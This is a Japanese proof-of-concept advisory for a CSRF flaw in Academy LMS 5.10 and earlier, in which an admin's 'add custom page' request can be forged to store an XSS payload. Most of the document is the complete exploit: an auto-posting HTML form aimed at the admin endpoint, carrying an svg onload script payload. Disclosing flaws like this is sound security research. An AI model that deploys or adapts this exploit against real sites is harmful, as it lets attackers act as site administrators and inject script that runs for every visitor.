
Academy LMS 5.10以下 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMSは、ユーザーがコースを作成・宣伝できるアプリケーションです。新しいページを追加する機能はCSRFに対して脆弱です。この攻撃を回避するためのトークンが存在しないためです。さらに、このページを使用して保存されたXSSペイロードを読み込む可能性があります。
概念実証の最初のステップは、管理ユーザーとしてプラットフォームに認証することです。
その後、脆弱性を悪用するコードを含むページにアクセスするだけで、Webサイトのホームページに新しいボタンが追加され、xssページにリダイレクトされることが確認できます。
エクスプロイトに使用されたコード:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>